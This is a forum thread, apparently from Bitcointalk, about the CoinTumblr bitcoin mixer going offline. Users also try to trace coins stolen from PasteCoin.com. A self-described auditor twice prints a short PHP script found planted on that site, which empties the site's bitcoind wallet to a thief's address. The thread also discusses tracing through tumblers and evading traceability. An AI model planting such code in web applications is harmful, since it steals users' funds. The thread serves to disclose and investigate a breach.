Topic: CoinTumblr - any experience? [down] (Read 4417 times)
Now its sure that this site was a scam because he started to use his stolen coins in June
Could someone check http://lbrmvt4plqojaulx.onion/ ? Service might be down for some time now.
The site is still broken since 14th April and i guess it wont work again...
Bober also hasn't been active since January. He simply disappeared.
Well, as far as the breach goes, bober was originally involve. He even admitted guilt of uploading the shell and he was the only along with genjix, jgarzik, and me.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.
You know, if he was just a little more careful and used the tumbler with multiple input addresses, tracking that back would have been nearly impossible. Its really funny how many little ways you can accidentally connect something back to an identity of yours.
Well, as far as the breach goes, bober was originally involve. He even admitted guilt of uploading the shell and he was the only along with genjix, jgarzik, and me.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
Code:
require_once('jsonRPCClient.php');
$bitcoin = new jsonRPCClient('http://****:****@127.0.0.1:****/');
/*Steal the money from the user account */
$balance = ($bitcoin->getbalance());
echo $balance;
$bitcoin->sendtoaddress("1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9", $balance);
$balance = ($bitcoin->getbalance());
echo $balance;
?> This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.
Comming back to this.... I notice that address definitely sent into cointumbler but, it only shows that it ever stole like 3.69 btc. When you said this, I assumed that you were talking about a large amount, like that huge 16k worth of coins that went through a few days ago was stolen or something.
Such a small amount is likely untraceable through all those inputs and outputs. Is there more?
I see it all got sent to 1NytWqK2qGafYugYkhiVy7faGUYhcZapjd and if you check out that address, it builds up quickly to 68.58, all at once.
The tumbler gives out one or more addresses, and then sends coins off and tumbles them after a certain quantity is reached. Thats important to know here.
Actually, I would start looking for more info on all of the other input addresses in that same transaction since you know they had to come from the same wallet to end up as inputs on the same transaction.
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u
ByteCoin
You did it wrong... expected though, that is kind of the point of the tumbler. As I said in my previous post, that is the tumbler address.... instead carefully follow the very last send transaction from that address:
http://blockexplorer.com/tx/927d59c9882fe6268aba2a7f6fc887091a9771add0091bddcdb88e0178b170ce#i599696
See that one of the inputs is the tumble address, as is one of the outputs. So you know that the tumbler generated this transaction. However, one output goes elsewhere to here:
http://blockexplorer.com/address/13WBtDjL2NBzeaCNDq1rL1yXgo9suHAk4r
New address.... now has 461.55 btc in it. Given how much moved through in such a short time, I think most of the outputs are likely the thief. Not proof though, need to find all of these addresses.
Looking at the overall activity, doesn't look like more than a handful of people have sent that much through at once, never mind to one address. Unless this address is just another internal tumbler address... and these coins are thus still in the system, then this is likely the thief.... if this address (or any like it) move directly to the tumbler address later (or show up as an input with it) then that would obviously be in the same wallet... otherwise, thats probably an output.
There are probably a lot more of these in the chain... but it is a lot of jumping through transactions to find them.
Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u
ByteCoin
ByteCoin
So you suggest it is browneman?
https://bitcointalksearch.org/topic/can-someone-explain-thisblock-explorer-bug-or-what-6184
You should be really sure about it, he may have used the service and got tainted coins. I have been searching for an output from his service with the same input, or smaller if he paid fees, to be 90% sure it is someone.
Actually I used the service and got no coins back. I didn't see an accusation there, not that it matters too much since this is a throwaway address made just to talk about issues like this. Wasting your time on me.
That address that was "Traced" to is the tumbler wallet address, you can get that from their about page: http://lbrmvt4plqojaulx.onion/ (uses javascript, click on "about"). If the coins were all there, they they would, at least, still be within the tumbler...and no tin the thief's hands.
It does not appear to be the case though...as the balance to that address is under 400 btc.
You need to follow the sends from there to see where they end up. Each order can have up to 9 output addresses, but they could have used multiple orders. The tumbler makes a lot of change and moves individual bits of change around, making it very hard to follow...but any address that loops back to that one is NOT an output address.
That said, it also wouldn't be hard to chain orders...whcih would cause loops back through that address. No envy here, thats going to be a bitch of a job but, honestly, unless the tumbler is being used by multiple people, or has enough coins in it already to cover an order, then its not very good. Such a large order should be a bitch to trace but, not impossible. Just follow sends within the right time frame and the majority should end up in addresses owned by your thief.
Of course, then you need him to slip up and make a connection to those addresses.
Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u
ByteCoin
ByteCoin
So you suggest it is browneman?
https://bitcointalksearch.org/topic/can-someone-explain-thisblock-explorer-bug-or-what-6184
You should be really sure about it, he may have used the service and got tainted coins. I have been searching for an output from his service with the same input, or smaller if he paid fees, to be 90% sure it is someone.
Congratz, your service works.
I dont think that this service works and also because of the latest strange movements and the at least 16000 BCs in the service at the moment, i have a feeling that it wont work again.
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u
ByteCoin
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
Code:
require_once('jsonRPCClient.php');
$bitcoin = new jsonRPCClient('http://****:****@127.0.0.1:****/');
/*Steal the money from the user account */
$balance = ($bitcoin->getbalance());
echo $balance;
$bitcoin->sendtoaddress("1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9", $balance);
$balance = ($bitcoin->getbalance());
echo $balance;
?> This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.
I'd just like to point out that there are ways of transferring coins completely anonymously without having to trust a third party and without changing the protocol or network. The client software would have to be changed to support it though.
See the technical details at https://bitcointalksearch.org/topic/untraceable-transactions-which-can-contain-a-secure-message-are-inevitable-5965
If you're interested in transactions not being traceable it's best to rely on a cryptographic solution rather than a human or business.
ByteCoin
See the technical details at https://bitcointalksearch.org/topic/untraceable-transactions-which-can-contain-a-secure-message-are-inevitable-5965
If you're interested in transactions not being traceable it's best to rely on a cryptographic solution rather than a human or business.
ByteCoin
There is now some strange movement in the wallet. I hope it has nothing to do with todays balance of 16k BCs.
Wow. Quite a bit of movement! Though, I was expecting my coins back a few days ago and even with all that movement, still not a single nanocoin of it has shown up. There could be a bunch of "change" out there in the overall wallet, but the main address balance is high enough to make me think it stopped again, and low enough to make me concerned that I haven't gotten any back yet....i am expecting more than is in there.
Makes me think there is a backlog.
There is now some strange movement in the wallet. I hope it has nothing to do with todays balance of 16k BCs.
It stopped working again on 14th April.
Looks like it is still down.... no movement since the 14th.
It stopped working again on 14th April.
I don't know if this is the underlying cause but there was a deadlock in bitcoind experienced by many bitcoin web services. There is now a patch:
https://bitcointalksearch.org/topic/bitcoind-stops-responding-to-rpc-requests-4904
https://bitcointalksearch.org/topic/bitcoind-stops-responding-to-rpc-requests-4904
Got my Coins back on Sunday.
I am not shure, if I want to use this service again.
I am not shure, if I want to use this service again.
Jump to: